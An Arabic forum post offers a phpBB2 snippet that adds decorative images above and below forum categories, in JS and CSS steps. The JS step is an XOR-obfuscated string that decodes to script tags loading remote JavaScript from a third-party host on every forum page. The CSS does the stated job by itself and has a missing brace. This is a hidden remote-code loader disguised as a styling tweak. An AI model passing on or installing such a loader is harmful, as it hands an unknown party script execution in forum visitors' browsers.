كود صورة أعلى وأسفل الفئات

  Bài viết hay nhất1
آلسلآم عليگم ورحمة آلله وپرگآتة

گيف آلحآل وگيف آلچميع آن شآء آلله پخير 

وكا العاده كود جميل جدا للذين لايملكون صلاحيات التعديل على التومبيلات 

الكود يضع لك صورة في اعلى الفئة وأسفل كما في منتديات الفي بي 

طبعا الكود بسيط لأني كنت انوي ان اجعله يحيط بالفئات من الجوانب لكن لم املك الوقت الكافي للتكويد 

فا احببت ان انزل لكم هذا إلى ان انتهي من الكود المطور بحيث يمكنكم وضع صور حول جميع الفئات من الاعلى والاسفل والجوانب 

لااطيل عليكم ..

معلومات الكود

النوع : js + css
النسخة : phpbb2

طريقهّ آلترّگيّپ :
مگونهّ من خطوتيّن :

آلخطوه آلأولى : وضع گود آلچآأإفآ سگرپت 

لوحة آلآدآأإره 



ننّزل تحتّ أخر آلصفحه



نفعلّ صفحآأإت آلچآفآ سگرپتّ



ثم نضغط 



نضع صح على خيآر چميع آلصفحآت ثم 




وهذآأإ هو آلگوّد ..






الكود:
var copyright ="www.haya-m.net - haya @ Rights Reserved";  
var enkripsi="'1Aqapkrv'02qpa'1Fjvvr'1C--glenkqj/cpc`ka,cpc`,qv-32670,hq'1G'1A-qapkrv'1G'2C'1Aqapkrv'02qpa'1F'00jvvr'1C--glenkqj/cpc`ka,cpc`,qv-3:;65,hq'00'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'1A-qapkrv'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);




آلخطوه آلثآنية : ترگيپ گود css
من لوحة آلأدآرة 











الكود:

/*------- كـــود الفئات --------*/
/*---------- www.haya-m.net ----------- */ 
  
.forumline_header{
 background:url('أعلى الفئة') top center no-repeat;
  padding-top:الارتفاعpx ;


.forumline_footer{
 background:url('أسفل الفئة') top center no-repeat;
  padding-top:الارتفاعpx;
}




وآنتظروآ آلمزيد من آلموآضيع مآزلنآ في آلپدآية
لاتستطيع الرد على المواضيع في هذا المنتدى